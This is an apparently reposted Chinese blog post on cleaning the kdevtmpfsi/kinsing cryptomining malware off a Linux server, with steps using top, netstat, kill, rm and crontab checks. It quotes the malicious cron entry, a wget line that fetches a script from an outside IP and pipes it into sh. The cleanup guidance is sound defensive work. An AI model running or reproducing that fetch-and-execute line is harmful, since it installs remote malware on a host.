【服务器】挖矿病毒 kdevtmpfsi(一针见效)
附:尝试了许多普通kill 和 rm 操作,发现根本无法解决问题。分析原因在于定时任务为删除掉。
状态:CPU爆满,导致线上服务宕机。
图片是盗的,进程占用是真实的。
1、# top
查看cpu占用情况,找到占用cpu的进程 最后是 kdevtmpfsi
2、# netstat -natp
根据上面的进程名查看与内网的 tcp 链接异常 ,看到陌生ip,查出为国外ip,估计主机被人种后门了
此时,挖矿脚本大概率定时在你的crontab里面。
crontab -l ,发现异常定时任务,* * * * * wget -q -O -http://195.3.146.118/unk.sh | sh > /dev/null 2>&1
解决办法:
top命令找到kdevtmpfsi和kinsing的进程号A和B
systemctl status 进程A
rm -fr /var/tmp/kinsing 和 rm -fr /tmp/kdevtmpfsi
kill -9 进程A 和 kill -9 进程B
cd /var/spool/cron 查看是否有相关的木马定时任务在执行(root文件里面为定时任务)有的话删掉再重启下crontab(命令:systemctl restart crond.service)
后续操作:(找到文件,全部删除,若没有则无需操作)
find / -name kdevtmpfsi
find / -name kinsing
转载:https://blog.csdn.net/oYuZhongManBu1234/article/details/104281503
【服务器】挖矿病毒 kdevtmpfsi(一针见效)相关推荐
- dbused把我的CPU占满了!linux服务器挖矿病毒的解决历程
dbused把我的CPU占满了!linux服务器挖矿病毒的解决历程 现象描述 今天通过密钥以普通用户tung的身份登录远程Cent OS服务器时,连接出现非常严重的卡顿,进入后发现CPU被名为dbus ...
- Linux 服务器上有挖矿病毒 kdevtmpfsi 处理办法
症状表现 服务器CPU资源使用一直处于100%的状态,通过 top 命令查看,发现可疑进程 kdevtmpfsi.通过 google搜索,发现这是挖矿病毒. 排查方法 首先:查看 kdevtmpfsi ...
- 云服务器挖矿病毒解毒方案
CPU占用率100% 但是top命令查不出来 阿里云服务器不小心中了挖矿病毒,可能是因为连接Redis的时候关闭了防火墙,或者是口令太弱 1.先大概还原了病毒攻击思路 2.知道它的攻击方式,就可以对症 ...
- 某云服务器挖矿病毒查杀日记
接手的某项目部署于某云平台centos服务器上,由tomcat作为中间件提供应用,且购买了该平台的域名服务,从2019年底上线运营,一直运行比较平稳,可能还没正式用起来,用的人也不是很多吧.但凡事总有 ...
- 服务器挖矿病毒的排查过程
今天同事反馈公司的某台服务器远程连接不上,登录服务器查看后,发现CPU使用率居高不下.kill掉后,一分钟有自动生成,整个排查思路如下: 1.top 命令查看主机负载,确认可疑进程为bashd 2.确 ...
- 记一次云服务器挖矿病毒处理过程
说明 本文章转自我的51cto博客,图片上有51cto的水印,现在准备移至csdn 背景 这个服务器是自己搭建靶场用的,处置流程只供参考 某天突然收到条阿里云安全中心的短信,说发现有挖矿程序 上控制台 ...
- php+挖矿病毒,Kdevtmpfsi 挖矿病毒处理方式
中毒线上状态:CPU占满90%+,引发线上服务处理异常缓慢等问题,从而导致业务异常. 处理方法: 1. 查看占用高的进程. # top 2. 排序按下1,找到占用高CPU的进程后,Ctrl+z退出. ...
- CentOS7 服务器挖矿病毒 删除又重新生成处理
使用 ls -l /proc/${process_id}/exe 查看进程执行 cat /var/spool/cron/root 查看日志 特征如下: CPU占用一直比较高,初步分析是挖矿程序: 系统 ...
- IDEA连接阿里云ECS运行的docker,及处理挖矿病毒kdevtmpfsi的经历
文章目录 前置条件 docker版本:1.13.1 相关参考文章 1.修改docker相关配置 1.1 修改docker配置文件 1.2 重新加载配置文件 1.3 重启docker 2.配置阿里云EC ...
最新文章
- MongDB的安装和基本操作 一(权限设置)
- 基于 Kubernetes 的边缘云原生
- 每天一点小知识004--关于获取物体名字
- Codeforces 1286C/1287E Madhouse (交互题)
- Android下 布局加边框 指定背景色 半透明
- MATLAB转化彩色图片为灰度图片命令行窗口代码:
- JSP直接调用一个action定向到页面
- FISCO BCOS专项兴趣小组(SIG)计划,硬核玩家们看过来
- 第一篇:FC-SAN存储技术
- Can‘t open /dev/sdb1 exclusively. Mounted filesystem?
- C51单片机的初次使用
- 【Python】用150行代码模拟太阳系行星运转+源码
- 使用Nginx实现多重流量复制
- JavaScript arguments详解
- 手把手教学:如何设计 SDK
- BZOJ3876支线剧情
- 初识C语言:多组输入的用法
- jquery禁用右键、文本选择功能、复制的代码
- python求不规则图形面积_Python求阴影部分面积
- C语言操作符详解------移位操作符
热门文章
- python的print语句有哪些_Python语句print(type([1,2,3,4]))的输出结果是。
- ResNet网络总结
- php easysms,二次开发-如何在PHPEMS-发送短信验证码(以easy-sms为例)
- telnet后为啥打开的时防火墙_飞机起降时为啥要打开遮光板?机餐为啥总觉得不好吃?答案看这里...
- Koa2-下载-文件流
- [弹性力学]弹力与材力的同一变量的规定正方向的不同导致公式中个别符号不同
- html5里面em是什么单位,HTML5中单位em的理解
- armqt字体ttf_QT字体的设置
- 网络工程师为什么要学python_网络工程师学python
- Linux 常用命令整理